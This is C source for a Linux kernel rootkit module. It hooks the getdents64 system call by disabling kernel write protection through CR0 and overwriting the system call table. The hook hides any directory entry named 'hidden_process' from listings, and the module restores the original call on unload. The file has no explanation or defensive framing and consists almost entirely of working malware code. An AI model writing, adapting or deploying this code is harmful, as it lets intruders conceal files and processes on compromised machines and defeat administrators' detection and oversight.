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&lt;linux/module.h&gt;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&lt;linux/kernel.h&gt;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&lt;linux/sched.h&gt;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&lt;linux/syscalls.h&gt;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unsigned long **sys_call_table;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asmlinkage long (*original_getdents)(unsigned int, struct linux_dirent64 *, unsigned int);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asmlinkage long hooked_getdents(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)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long ret = original_getdents(fd, dirp, count);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linux_dirent64 *d;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bpos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(bpos = 0; bpos &lt; ret;)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 = (struct linux_dirent64 *)((char *)dirp + bpos);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(strstr(d-&gt;d_name, "hidden_process"))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memmove(d, (char *)d + d-&gt;d_reclen, ret - bpos - d-&gt;d_reclen);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 -= d-&gt;d_reclen;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bpos += d-&gt;d_reclen;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ret;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static int __init rootkit_init(void)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sys_call_table = (unsigned long **)kallsyms_lookup_name("sys_call_table");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write_cr0(read_cr0() &amp; (~0x10000));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original_getdents = (void *)sys_call_table[__NR_getdents64];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sys_call_table[__NR_getdents64] = (unsigned long *)hooked_getdents;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write_cr0(read_cr0() | 0x10000);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static void __exit rootkit_exit(void)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write_cr0(read_cr0() &amp; (~0x10000));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sys_call_table[__NR_getdents64] = (unsigned long *)original_getdents;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write_cr0(read_cr0() | 0x10000);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module_init(rootkit_init);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module_exit(rootkit_exit);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MODULE_LICENSE("GPL");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